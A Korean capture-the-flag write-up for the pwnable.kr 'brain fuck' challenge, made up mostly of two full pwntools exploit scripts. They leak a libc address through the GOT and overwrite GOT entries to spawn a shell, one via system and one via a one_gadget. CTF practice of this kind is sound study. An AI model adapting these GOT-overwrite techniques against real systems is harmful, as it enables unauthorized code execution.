[pwnable.kr] brain fuck
Gyeongje
2018. 7. 20. 00:46
# pwnable.kr "brain fuck" solve script (Python 2: print statements, str payloads).
# Flow, as the script's own comments describe it: walk the interpreter's tape
# pointer onto the GOT, leak the resolved fgets address with `.`, compute the
# libc base from bf_libc.so, then answer three `,` reads with the values that
# overwrite the fgets, memset and putchar GOT slots, and let the final `.`
# (putchar) transfer control to the overwritten slot.
#
# Defender's note: every address below is hard-coded (0x804a0a0, the GOT
# slots, main at 0x08048671), i.e. the binary is assumed non-PIE with a
# writable GOT. Full RELRO makes the GOT read-only and PIE randomises these
# addresses; both mitigations would invalidate this script as written.
from pwn import *
#p = process('./bf')
p = remote('pwnable.kr',9001)
#e = ELF('/lib/i386-linux-gnu/libc-2.23.so')
e = ELF('./bf_libc.so')  # libc shipped with the challenge; all symbol offsets come from it
point = 0x804a0a0  # presumably the interpreter's initial tape pointer - confirm against the binary
pnum = 0  # overwritten below before first use
memset_got = 0x804a02c
fgets_got = 0x804a010
putchar_got = 0x804a030
# Move the tape pointer left onto fgets@GOT; `point` mirrors where the
# interpreter's pointer is after each walk so later distances stay correct.
pnum = point - fgets_got
point -= pnum
payload = '<' * pnum
payload += '.>' * 4  # emit 4 bytes: the resolved fgets address (read back with recvn(4) below)
payload += '<' * 4
payload += ',>' * 4  # read 4 bytes into the same cells: first GOT overwrite
payload += '<' * 4
pnum = memset_got - point
point += pnum
payload += '>' * pnum
payload += ',>' * 4  # second overwrite (memset@GOT)
payload += '<' * 4
pnum = putchar_got - point
point += pnum
payload += '>' * pnum
payload += ',>' * 4  # third overwrite (putchar@GOT)
payload += '<' * 4
payload += '.'  # output goes through the putchar slot, which has just been rewritten
p.sendlineafter('[ ]\n', payload)
# recvn(4) rather than recv(): the prose below notes that recv() returns
# short over the network, which would corrupt the 4-byte leak.
fgets = u32(p.recvn(4)) #fgets.got.plt leak
base = fgets - e.symbols['fgets']
gets = base + e.symbols['gets']
system = base + e.symbols['system']
main = 0x08048671  # address of main in the (non-PIE) challenge binary
print 'fgets : ' + hex(fgets)
print 'base : ' + hex(base)
print 'gets : ' + hex(gets)
print 'system : ' + hex(system)
# The three sends answer the three `,>`*4 reads in tape order (fgets, memset,
# putchar), matching the author's trailing comments.
p.send(p32(system)) #fgets_got
p.send(p32(gets)) #memset_got
p.send(p32(main)) #putchar_got
p.sendline('/bin/sh\00')  # '\00' is an octal escape: a single NUL byte terminates the string
p.interactive()
꿀잼이다 ㅎㅎ
여기서 memset을 기준으로 leak을 했을때 라이브러리(libc) 충돌이 일어나서 offset 계산이 잘 안되가지구 fgets로 계산했더니 잘되더라 ㅎㅎ..
그리고 한글자씩 출력하는데 local에선 recv로도 되지만 서버에선 느리기때문에 sleep을 걸어주거나 recvn을 사용하면 소켓 전송을 잘 잡을 수 있다 ㅎ_ㅎ
[one shot]
one_gadget ./bf_libc 치면 오프셋 나옴 base에 더하면 됨
# "One shot" variant of the solve script above (Python 2). Same tape walk and
# fgets@GOT leak, but the memset@GOT overwrite is disabled (commented out), so
# only two `,` reads remain: the fgets slot receives a one_gadget address and
# the putchar slot again receives main.
#
# Defender's note: as in the first script, the hard-coded binary addresses
# assume no PIE and a writable GOT (no Full RELRO); the one_gadget offset is
# specific to the exact libc build shipped as bf_libc.so.
from pwn import *
#p = process('./bf')
p = remote('pwnable.kr',9001)
#e = ELF('/lib/i386-linux-gnu/libc-2.23.so')
e = ELF('./bf_libc.so')  # challenge libc; symbol offsets and the one_gadget offset both refer to it
point = 0x804a0a0  # presumably the interpreter's initial tape pointer - confirm against the binary
pnum = 0  # overwritten below before first use
memset_got = 0x804a02c
fgets_got = 0x804a010
putchar_got = 0x804a030
# Walk left onto fgets@GOT; `point` tracks the interpreter's pointer position.
pnum = point - fgets_got
point -= pnum
payload = '<' * pnum
payload += '.>' * 4  # leak the resolved fgets address (4 bytes)
payload += '<' * 4
payload += ',>' * 4  # first overwrite (fgets@GOT)
payload += '<' * 4
pnum = memset_got - point
point += pnum
payload += '>' * pnum
# memset@GOT overwrite not needed in the one-gadget variant; kept for reference.
#payload += ',>' * 4
#payload += '<' * 4
pnum = putchar_got - point
point += pnum
payload += '>' * pnum
payload += ',>' * 4  # second overwrite (putchar@GOT)
payload += '<' * 4
payload += '.'  # output through the rewritten putchar slot
p.sendlineafter('[ ]\n', payload)
# recvn(4): a plain recv() can return fewer than 4 bytes over the network.
fgets = u32(p.recvn(4)) #fgets.got.plt leak
base = fgets - e.symbols['fgets']
gets = base + e.symbols['gets']
system = base + e.symbols['system']
one_shot = base + 0x3a7ec  # 0x3a7ec: one_gadget offset for bf_libc.so (see prose above); libc-build specific
main = 0x08048671  # address of main in the (non-PIE) challenge binary
print 'fgets : ' + hex(fgets)
print 'base : ' + hex(base)
print 'gets : ' + hex(gets)
print 'system : ' + hex(system)
print 'one_shot : ' + hex(one_shot)
# Two sends answer the two remaining `,>`*4 reads, in tape order.
p.send(p32(one_shot))
#p.send(p32(system)) #fgets_got
#p.send(p32(gets)) #memset_got
p.send(p32(main)) #putchar_got
#p.sendline('/bin/sh\00')
p.interactive()